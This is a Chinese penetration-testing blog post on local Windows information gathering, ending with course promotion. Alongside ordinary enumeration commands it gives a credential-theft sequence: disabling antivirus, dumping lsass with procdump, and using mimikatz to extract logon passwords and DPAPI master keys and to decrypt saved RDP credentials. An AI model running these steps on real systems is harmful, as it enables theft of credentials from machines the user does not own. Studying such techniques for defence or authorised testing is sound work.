前言
本文的主题为基本的信息收集方式,不包含域内信息收集,域内信息收集得再过几天看看,本文用的windows server 2019内核版本比较高,还有一些信息收集技巧行不通,比如检查杀毒软件情况,就不举例了,文章仅供参考
一些工具准备
mimikatz:https://github.com/ParrotSec/mimikatz ProcDump:https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump
当前用户信息
查看当前用户信息,RID,组信息,特权信息
whoami /all
image-20240905101003965
image-20240905101020438
image-20240905101033968
系统信息
systeminfo
image-20240905142138399
网络及端口状态
netstat -an
这里,-a 表示显示所有连接和监听端口,-n 表示以数字形式显示地址和端口号。
image-20240905143044809
LISTENING:表示监听中,这个端口正在开放,可以提供服务 SYN_SENT:客户端已经发送连接请求(SYN),并正在等待服务器的确认(SYN-ACK报文)。这是TCP三次握手过程中的一个状态。 CLOSED:连接已关闭,不再存在。 TIME_WAIT:连接已关闭,但TCP协议规定在这段时间内(通常是2倍的最大报文存活时间,即2MSL)不能立即使用该连接相同的四元组(源IP、源端口、目标IP、目标端口)建立新的连接,以防止旧连接的残留数据干扰新连接。【MSL,报文最大生存时间可能是30秒、1分钟或2分钟,取决于操作系统】 ESTABLISHED:连接已成功建立,数据可以在客户端和服务器之间双向传输。比如HTTP/HTTPS,FTP,SMTP,SSH,MYSQL,RDP(windows远程桌面服务)等
当前主机名称
hostname
image-20240905145123833
当前操作系统
wmic OS
image-20240905145455078
这么不好看?就使用get命令对每一列进行筛选,赛选常用的信息
image-20240905145635717
wmic OS get Caption,CSDVersion,OSArchitecture,Version
image-20240905145906782
安装的应用程序
wmic product get name,version
image-20240905154110362
在线用户
quser
image-20240905154228123
网络配置
ipconfig /all
image-20240905154307635
查看进程
tasklist /v
image-20240905161009326
查看当前登录域
net config workstation
image-20240905161459979
远程桌面连接历史记录
有的话就有,可以把凭证取下来进行本地解密、没有的话会显示无
cmdkey /list
image-20240905161920815
以下是解密过程(失败了)参考:https://www.cnblogs.com/websecyw/p/12842741.html
查看是否存在凭证,记录好这个红色框值,和目录进行拼接
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* # 拼接后的文件路径待会要用 C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
image-20240905181423506
lsass.dmp文件默认情况下并不能直接复制,所以要用到procdump工具打包凭证信息(本文演示的为没有杀毒的操作,记得先关闭杀毒软件,不然会拒绝访问)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
image-20240905164311440
把这个目录下得lsass.dmp复制到mimikatz目录下
copy lsass.dmp C:\Users\Administrator\Desktop\mimikatz\mimikatz
image-20240905175840747
使用工具mimikatz
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"
image-20240905180631025
记录好guidMasterKey,为{a77cdf8b-ca6e-4a91-a406-d1ab7105712e}
image-20240905184525397
获取超管对应的MasterKey
sekurlsa::dpapi
image-20240905181115959
找到之前所对应得guid得到masterkey,使用Masterkey解密凭证得到明文密码
dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:fcffc5d85122c8bb31d33e927009e0c939b65a1d335565e7c5e12fd17555b625ad6a6fc03244dad05c0f026d1e425fcb5d8dc77bd4c6205d847e7526e6b2f38b
确保你的系统没有打补丁(也许不是补丁,我用的winserver2019),这里我的失败了,下次再试试
本机用户
net user
image-20240905190433411
某用户的X信息
net user 用户名
`黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
特别声明:
此教程为纯技术分享!本书的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失!!!。
扫一扫
882
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
